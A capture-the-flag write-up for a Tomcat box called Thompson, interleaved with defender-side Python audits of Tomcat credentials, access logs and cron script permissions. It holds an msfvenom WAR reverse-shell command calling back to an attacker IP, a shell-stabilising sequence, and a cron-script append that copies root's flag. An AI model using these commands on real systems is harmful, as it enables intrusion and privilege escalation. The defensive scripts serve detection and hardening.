# Thompson

![](/files/-McQJ2k4ffYB79rncIY3)

## Reconnaissance

Initial nmap scan to find open ports, using the flag "treat all hosts as alive" (**-Pn**):

```
nmap -Pn 10.10.196.112
```

![](/files/-McQJp4_7ZKc0Gm7SWgg)

Detailed Nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p**: specifying ports 22, 8009 and 8080
* **-oN nmap**: saving the output to a file called `nmap`

```
nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112
```

![](/files/-McQJs4hzlGltGjl8JND)

## Enumeration

Let's visit the site on port 8080.

![](/files/-McQKGrlKH_0ZYifdhML)

It's an Apache Tomcat page with a Manager App link; let's click it and see what it says.

![](/files/-McQKbk1iiVDapJPf9pq)

We need a username and a password and we do not have one, so let's click cancel. Once we do, we get this page:

![](/files/-McQKp8Gw-qfvV1hjdwJ)

This page gives us a username and a password, so let's use these credentials to log in.

![](/files/-McQL-cqEdCnTurgNysW)

We are logged in. Looking through the Web Application Manager, we see something interesting.

![](/files/-McQLEnA8E2if4rw_8A2)

We can upload `WAR` files, so we can build a WAR payload that gives us a reverse shell on the machine.
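As an added, defender-side example (not part of this writeup and not Tomcat's own code), the following Python script audits a `tomcat-users.xml` file for accounts that hold Manager or Admin roles while using weak or documentation-example credentials, which is the misconfiguration this box relies on. The XML content is constructed for the demo; the role names and the `tomcat`/`s3cret` pair come from Tomcat's own documentation and Manager 401 page, and the minimum length threshold is an assumed policy value.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml for the demo (not the file from the target box).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deployer" password="Xq9!Lm4#tRv8wZ" roles="manager-script"/>
  <user username="ops" password="e4a1c2b3d4e5f6a7$1000$9f8e7d6c5b4a39281716151413121110" roles="manager-script"/>
  <user username="reader" password="reader" roles="tomcat"/>
</tomcat-users>
"""

# Roles that grant control over deployed applications (Manager and Host Manager webapps).
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status",
                    "admin-gui", "admin-script"}

# The username/password pair that Tomcat's documentation and its Manager 401 page
# use as an example; it must never be left in a real tomcat-users.xml.
DOCUMENTATION_EXAMPLES = {("tomcat", "s3cret")}

HEX_DIGEST = re.compile(r"^[0-9a-fA-F]{32,}$")


def local_name(tag):
    """Strip the XML namespace so the check works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]


def looks_hashed(password):
    """Tomcat's digest tool emits either a bare hex digest or salt$iterations$digest."""
    return bool(HEX_DIGEST.match(password)) or password.count("$") == 2


def audit_tomcat_users(xml_text, min_length=12):
    """Return findings for privileged users with weak plaintext passwords.

    min_length is an assumed policy value, not something Tomcat enforces.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if local_name(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue          # unprivileged accounts cannot deploy applications
        if looks_hashed(password):
            continue          # strength of a digest cannot be judged from the file
        reasons = []
        if (name, password) in DOCUMENTATION_EXAMPLES:
            reasons.append("documentation example credentials")
        if password.lower() == name.lower():
            reasons.append("password equals username")
        if len(password) < min_length:
            reasons.append(f"password shorter than {min_length} characters")
        if reasons:
            findings.append({"username": name, "roles": sorted(privileged), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['username']} ({', '.join(f['roles'])}): {'; '.join(f['reasons'])}")
```

Run it against `$CATALINA_BASE/conf/tomcat-users.xml`; on the sample it reports only the `tomcat` account. Hashed passwords are skipped rather than judged, and accounts without a Manager or Admin role are ignored since they cannot deploy anything; if the Manager application is not needed at all, removing `webapps/manager` removes the deploy path entirely.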

## Exploitation

Let's first make the payload; make sure to replace my IP with yours.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war
```

![](/files/-McQLu2SCTUd4SQG2_5V)

Let's upload the file: click on Browse and select the file.

![](/files/-McQMBiBf0nMEGrqYwWi)

Hit Deploy and you should now see the file listed.

![](/files/-McQMJoXekquobxp-0pK)

Now let's start a netcat listener.

![](/files/-McQMPOGjGCkW9qV34ve)

Click on the file and you should get a reverse shell.

![](/files/-McQMVkL9gbL8NYFInUJ)
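From the detection side, the whole sequence above (Manager login, WAR upload, first request to the new context) leaves a clear trail in Tomcat's access log. The Python below is an added example, not part of this writeup or of Tomcat: it parses lines in the common `%h %l %u %t "%r" %s %b` pattern, flags deploy requests to the Manager endpoints, and then flags the first hit on a context never seen earlier in the log when it comes from the deploying host within a window. The log excerpt is constructed, the five-minute window is an assumption, and the context name `/reverse` only mirrors the `reverse.war` used above.

```python
import re
from datetime import datetime, timedelta

# Constructed Tomcat access_log excerpt in the common pattern "%h %l %u %t \"%r\" %s %b".
# Not a log from the target box; the sequence mirrors the writeup's steps: a 401 on the
# Manager app, a successful login, a WAR upload, then the first request to the new context.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [12/Jun/2021:10:14:55 +0000] "GET /manager/html HTTP/1.1" 401 2473
203.0.113.5 - tomcat [12/Jun/2021:10:15:02 +0000] "GET /manager/html HTTP/1.1" 200 18754
203.0.113.5 - tomcat [12/Jun/2021:10:15:40 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=AB12 HTTP/1.1" 200 19420
203.0.113.5 - - [12/Jun/2021:10:16:01 +0000] "GET /reverse/ HTTP/1.1" 200 0
198.51.100.9 - - [12/Jun/2021:10:16:10 +0000] "GET /docs/ HTTP/1.1" 200 3214
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager endpoints through which a WAR can be deployed (HTML upload form and text API).
DEPLOY_PREFIXES = ("/manager/html/upload", "/manager/text/deploy")


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def context_of(path):
    """First path segment, i.e. the web application context ("/reverse" for "/reverse/x")."""
    first = path.split("?", 1)[0].split("/")
    return "/" + first[1] if len(first) > 1 and first[1] else "/"


def detect_manager_deploys(log_text, window=timedelta(minutes=5)):
    """Flag deployments through the Manager app and the first hit on a context not seen
    earlier in the log when it comes from the deploying host within `window`
    (an assumed correlation window)."""
    alerts = []
    seen_contexts = set()
    deploys = []   # (host, time) of each deploy request
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        ctx = context_of(rec["path"])
        if rec["path"].startswith(DEPLOY_PREFIXES):
            alerts.append({"kind": "manager_deploy", "host": rec["host"], "user": rec["user"],
                           "time": rec["time"], "path": rec["path"]})
            deploys.append((rec["host"], rec["time"]))
        elif ctx not in seen_contexts:
            for host, when in deploys:
                if host == rec["host"] and timedelta(0) <= rec["time"] - when <= window:
                    alerts.append({"kind": "new_context_after_deploy", "host": rec["host"],
                                   "context": ctx, "time": rec["time"], "deployed_at": when})
                    break
        seen_contexts.add(ctx)
    return alerts


if __name__ == "__main__":
    for a in detect_manager_deploys(SAMPLE_ACCESS_LOG):
        print(a["kind"], a["host"], a.get("path") or a.get("context"), a["time"].isoformat())
```

On the sample this yields two alerts: the `POST /manager/html/upload` by user `tomcat`, and the first request to `/reverse` from the same host 21 seconds later; the unrelated `/docs/` request from another host is not flagged. Because "never seen before" is judged only within the supplied log, feed it a long enough history that legitimate contexts are already known.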

Let's stabilize the shell with these commands:

```
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + z
```

![](/files/-McQNJeTivXRNZYeeuzR)

We can read the `user.txt` file.

![](/files/-McQNp3X3T98Lfb0qzY3)

There are two other files in the directory; let's look at what they contain.

![](/files/-McQO1VMc4u-gJFY6W-7)

It looks like `id.sh` runs the `id` command and writes the output to a file called `test.txt`. Let's check the cron jobs running on this machine.

![](/files/-McQP9mTQXDlJ51OW780)

Looks like a cron job is running the script in `/home/jack`, so let's get the root flag copied into this directory by adding the command to `id.sh`, and then read it.

![](/files/-McQPrIjHNRRp0fX3NZ5)

We can edit the file using `nano`, or append the line with this command:

```
echo "cp /root/root.txt /home/jack/root.txt" >> id.sh
```

Once we do this, we should see the `root.txt` file appear in our directory and we can read it.

![](/files/-McQQFTwc4R2_YleMchf)
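The privilege escalation works only because a root cron job executes a script that an unprivileged user can modify. As an added, defender-side example (not from this writeup), here is a small Python audit that parses `/etc/crontab`-style entries and reports jobs whose script, or the directory holding it, is writable by someone other than the expected owner. The crontab text and the directory tree are constructed in a temporary directory for the demo; the `expected_owner_uid` parameter, the `.sh`-suffix heuristic and the handling of `cd` are assumptions of this script rather than anything cron itself defines.

```python
import os
import stat
import tempfile

# Constructed system-crontab text (not the crontab from the target box). In /etc/crontab
# the five schedule fields are followed by the user the job runs as, then the command.
DEMO_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root cd {home}/jack && bash id.sh
*/5 * * * * root {home}/ops/safe.sh
@reboot root {home}/ops/boot.sh
"""

SHELL_WORDS = {"cd", "bash", "sh", "&&", "||", ";", "|"}


def script_candidates(command):
    """Absolute paths of script-looking tokens in a cron command.

    A leading `cd <dir>` is honoured so that `cd /home/jack && bash id.sh` resolves
    to /home/jack/id.sh, which is the shape of the job in this writeup.
    """
    cwd = None
    tokens = command.split()
    paths = []
    for i, tok in enumerate(tokens):
        if tok == "cd" and i + 1 < len(tokens):
            cwd = tokens[i + 1]
            continue
        if tok in SHELL_WORDS or tok == cwd:
            continue
        if tok.startswith("/"):
            paths.append(tok)
        elif tok.endswith(".sh") and cwd:
            paths.append(os.path.join(cwd, tok))
    return paths


def audit_crontab(text, expected_owner_uid=0):
    """Return (user, script, reason) tuples for jobs whose script, or the directory
    holding it, can be changed by someone other than the expected owner.
    expected_owner_uid defaults to root, the usual owner of /etc/crontab jobs."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue   # comments and environment assignments
        n = 2 if line.startswith("@") else 6      # @reboot-style entries have one schedule field
        parts = line.split(None, n)
        if len(parts) != n + 1:
            continue
        user, command = parts[n - 1], parts[n]
        for script in script_candidates(command):
            if not os.path.exists(script):
                findings.append((user, script, "script does not exist"))
                continue
            for path in (script, os.path.dirname(script)):
                st = os.stat(path)
                if st.st_mode & stat.S_IWOTH:
                    findings.append((user, script, f"{path} is world-writable"))
                elif st.st_mode & stat.S_IWGRP:
                    findings.append((user, script, f"{path} is group-writable (gid {st.st_gid})"))
                if st.st_uid != expected_owner_uid:
                    findings.append((user, script, f"{path} is owned by uid {st.st_uid}, not {expected_owner_uid}"))
    return findings


def run_demo():
    """Build a throwaway tree mirroring the box (a world-writable id.sh under jack's home
    next to a properly protected script) and audit it. The demo files are owned by the
    current user, so that uid is passed as the expected owner."""
    home = tempfile.mkdtemp(prefix="cron-audit-")
    jack, ops = os.path.join(home, "jack"), os.path.join(home, "ops")
    for d in (jack, ops):
        os.mkdir(d)
        os.chmod(d, 0o755)
    bad, good = os.path.join(jack, "id.sh"), os.path.join(ops, "safe.sh")
    with open(bad, "w") as fh:
        fh.write("#!/bin/bash\nid > test.txt\n")
    with open(good, "w") as fh:
        fh.write("#!/bin/bash\nlogger heartbeat\n")
    os.chmod(bad, 0o777)    # the writeup's weakness: anyone can append to the root job's script
    os.chmod(good, 0o755)
    findings = audit_crontab(DEMO_CRONTAB.format(home=home), expected_owner_uid=os.getuid())
    return {"bad": bad, "good": good, "findings": findings}


if __name__ == "__main__":
    for user, script, reason in run_demo()["findings"]:
        print(f"[{user}] {script}: {reason}")
```

Against a real host, read `/etc/crontab` and the files in `/etc/cron.d` with the default `expected_owner_uid=0`. The demo reports `id.sh` as world-writable, says nothing about `safe.sh`, and also reports the non-existent `boot.sh`, since a missing script in a directory a user controls is the same problem waiting to happen. The fix on the box side is the usual one: root-owned scripts with mode `0755` or tighter, in a directory that non-root users cannot write to.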

